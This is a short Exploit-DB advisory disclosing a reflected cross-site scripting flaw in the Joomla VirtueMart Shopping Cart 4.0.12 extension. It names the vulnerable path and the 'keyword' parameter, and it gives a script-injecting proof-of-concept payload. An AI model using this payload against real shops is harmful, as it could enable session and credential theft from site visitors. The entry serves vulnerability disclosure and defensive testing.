[webapps] Joomla VirtueMart Shopping Cart 4.0.12 - Reflected XSS

 11 months ago
source link: https://www.exploit-db.com/exploits/51631
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Joomla VirtueMart Shopping Cart 4.0.12 - Reflected XSS



EDB Verified:







Vulnerable App:

# Exploit Title: Joomla VirtueMart Shopping-Cart 4.0.12 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 24/07/2023
# Vendor: VirtueMart Team
# Vendor Homepage: https://www.virtuemart.net/
# Software Link: https://demo.virtuemart.net/
# Joomla Extension Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/virtuemart/
# Version: 4.0.12
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site

## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob

## Description

The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials

Path: /product-variants

GET parameter 'keyword' is vulnerable to RXSS


[XSS Payload]: uk9ni"><script>alert(1)</script>a6di2

[-] Done

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